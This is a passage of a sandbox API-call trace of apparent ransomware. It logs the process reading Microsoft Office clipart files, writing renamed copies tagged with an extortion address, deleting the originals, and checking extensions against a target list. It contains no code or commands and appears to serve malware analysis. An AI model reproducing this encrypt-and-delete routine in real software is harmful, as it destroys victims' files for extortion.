lpNumberOfBytesWritten=0x2c5fc9c*=0x2130, lpOverlapped=0x0) returned 1 [0056.729] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.729] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.729] SetEndOfFile (hFile=0x17c) returned 1 [0056.730] CloseHandle (hObject=0x17c) returned 1 [0056.730] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.730] SetEndOfFile (hFile=0x240) returned 1 [0056.730] CloseHandle (hObject=0x240) returned 1 [0056.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.731] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf")) returned 1 [0056.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0056.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0056.731] lstrlenW (lpString=".doc") returned 4 [0056.731] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.731] lstrlenW (lpString=".docx") returned 5 [0056.731] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.731] lstrlenW (lpString=".pdf") returned 4 [0056.731] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.731] lstrlenW (lpString=".xls") returned 4 [0056.731] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.731] lstrlenW (lpString=".xlsx") returned 5 [0056.731] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.731] lstrlenW (lpString=".ppt") returned 4 [0056.731] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0056.732] lstrlenW (lpString=".zip") returned 4 [0056.732] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.732] lstrlenW (lpString=".rar") returned 4 [0056.732] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.732] lstrlenW (lpString=".bz2") returned 4 [0056.732] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.732] lstrlenW (lpString=".7z") returned 3 [0056.732] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0056.732] lstrlenW (lpString=".dbf") returned 4 [0056.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0056.732] lstrlenW (lpString=".1cd") returned 4 [0056.732] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 63 [0056.732] lstrlenW (lpString=".jpg") returned 4 [0056.732] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.734] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.734] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.734] GetLastError () returned 0x0 [0056.734] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0056.737] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0056.738] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.738] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.738] SetEndOfFile (hFile=0x17c) returned 1 [0056.738] CloseHandle (hObject=0x17c) returned 1 [0056.738] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.738] SetEndOfFile (hFile=0x240) returned 1 [0056.739] CloseHandle (hObject=0x240) returned 1 [0056.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.739] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf")) returned 1 [0056.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0056.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0056.740] lstrlenW (lpString=".doc") returned 4 [0056.740] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.740] lstrlenW (lpString=".docx") returned 5 [0056.740] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.740] lstrlenW (lpString=".pdf") returned 4 [0056.740] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.740] lstrlenW (lpString=".xls") returned 4 [0056.740] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.740] lstrlenW (lpString=".xlsx") returned 5 [0056.740] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.740] lstrlenW (lpString=".ppt") returned 4 [0056.740] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0056.740] lstrlenW (lpString=".zip") returned 4 [0056.740] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.740] lstrlenW (lpString=".rar") returned 4 [0056.740] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.740] lstrlenW (lpString=".bz2") returned 4 [0056.740] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.740] lstrlenW (lpString=".7z") returned 3 [0056.740] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0056.740] lstrlenW (lpString=".dbf") returned 4 [0056.741] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0056.741] lstrlenW (lpString=".1cd") returned 4 [0056.741] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 63 [0056.741] lstrlenW (lpString=".jpg") returned 4 [0056.741] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.741] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.741] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.741] GetLastError () returned 0x0 [0056.741] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1e7c, lpOverlapped=0x0) returned 1 [0056.743] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1e80, lpOverlapped=0x0) returned 1 [0056.744] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.744] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.744] SetEndOfFile (hFile=0x17c) returned 1 [0056.744] CloseHandle (hObject=0x17c) returned 1 [0056.744] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.744] SetEndOfFile (hFile=0x240) returned 1 [0056.745] CloseHandle (hObject=0x240) returned 1 [0056.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.745] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf")) returned 1 [0056.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0056.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0056.746] lstrlenW (lpString=".doc") returned 4 [0056.746] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.746] lstrlenW (lpString=".docx") returned 5 [0056.746] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.746] lstrlenW (lpString=".pdf") returned 4 [0056.746] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.746] lstrlenW (lpString=".xls") returned 4 [0056.746] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.746] lstrlenW (lpString=".xlsx") returned 5 [0056.746] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.746] lstrlenW (lpString=".ppt") returned 4 [0056.746] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0056.746] lstrlenW (lpString=".zip") returned 4 [0056.746] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.746] lstrlenW (lpString=".rar") returned 4 [0056.746] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.746] lstrlenW (lpString=".bz2") returned 4 [0056.746] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.746] lstrlenW (lpString=".7z") returned 3 [0056.746] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0056.746] lstrlenW (lpString=".dbf") returned 4 [0056.746] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0056.746] lstrlenW (lpString=".1cd") returned 4 [0056.746] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 63 [0056.746] lstrlenW (lpString=".jpg") returned 4 [0056.746] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.747] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.747] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.747] GetLastError () returned 0x0 [0056.747] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x7e0, lpOverlapped=0x0) returned 1 [0056.750] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0056.751] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.752] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.752] SetEndOfFile (hFile=0x17c) returned 1 [0056.752] CloseHandle (hObject=0x17c) returned 1 [0056.752] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.752] SetEndOfFile (hFile=0x240) returned 1 [0056.753] CloseHandle (hObject=0x240) returned 1 [0056.753] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf")) returned 1 [0056.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0056.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0056.753] lstrlenW (lpString=".doc") returned 4 [0056.753] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.753] lstrlenW (lpString=".docx") returned 5 [0056.754] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.754] lstrlenW (lpString=".pdf") returned 4 [0056.754] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.754] lstrlenW (lpString=".xls") returned 4 [0056.754] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.754] lstrlenW (lpString=".xlsx") returned 5 [0056.754] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.754] lstrlenW (lpString=".ppt") returned 4 [0056.754] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0056.754] lstrlenW (lpString=".zip") returned 4 [0056.754] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.754] lstrlenW (lpString=".rar") returned 4 [0056.754] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.754] lstrlenW (lpString=".bz2") returned 4 [0056.754] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.754] lstrlenW (lpString=".7z") returned 3 [0056.754] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0056.754] lstrlenW (lpString=".dbf") returned 4 [0056.754] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0056.754] lstrlenW (lpString=".1cd") returned 4 [0056.754] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0056.754] lstrlenW (lpString=".jpg") returned 4 [0056.754] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.756] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.756] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.757] GetLastError () returned 0x0 [0056.757] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x9bc, lpOverlapped=0x0) returned 1 [0056.758] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0056.759] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.759] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.759] SetEndOfFile (hFile=0x17c) returned 1 [0056.759] CloseHandle (hObject=0x17c) returned 1 [0056.759] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.759] SetEndOfFile (hFile=0x240) returned 1 [0056.760] CloseHandle (hObject=0x240) returned 1 [0056.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.761] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 1 [0056.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0056.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0056.761] lstrlenW (lpString=".doc") returned 4 [0056.761] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.761] lstrlenW (lpString=".docx") returned 5 [0056.761] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.761] lstrlenW (lpString=".pdf") returned 4 [0056.761] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.761] lstrlenW (lpString=".xls") returned 4 [0056.761] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.761] lstrlenW (lpString=".xlsx") returned 5 [0056.761] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.761] lstrlenW (lpString=".ppt") returned 4 [0056.761] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.761] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0056.761] lstrlenW (lpString=".zip") returned 4 [0056.761] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.761] lstrlenW (lpString=".rar") returned 4 [0056.761] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.761] lstrlenW (lpString=".bz2") returned 4 [0056.761] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.761] lstrlenW (lpString=".7z") returned 3 [0056.762] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0056.762] lstrlenW (lpString=".dbf") returned 4 [0056.762] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0056.762] lstrlenW (lpString=".1cd") returned 4 [0056.762] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0056.762] lstrlenW (lpString=".jpg") returned 4 [0056.762] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.762] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.762] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0056.763] GetLastError () returned 0x0 [0056.763] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0xd14, lpOverlapped=0x0) returned 1 [0056.764] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xd20, lpOverlapped=0x0) returned 1 [0056.765] ReadFile (in: hFile=0x240, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.765] WriteFile (in: hFile=0x17c, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.765] SetEndOfFile (hFile=0x17c) returned 1 [0056.765] CloseHandle (hObject=0x17c) returned 1 [0056.765] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.765] SetEndOfFile (hFile=0x240) returned 1 [0056.766] CloseHandle (hObject=0x240) returned 1 [0056.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf")) returned 1 [0056.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0056.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0056.767] lstrlenW (lpString=".doc") returned 4 [0056.767] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.768] lstrlenW (lpString=".docx") returned 5 [0056.768] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.768] lstrlenW (lpString=".pdf") returned 4 [0056.768] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.768] lstrlenW (lpString=".xls") returned 4 [0056.768] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.768] lstrlenW (lpString=".xlsx") returned 5 [0056.768] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.768] lstrlenW (lpString=".ppt") returned 4 [0056.768] lstrcmpiW 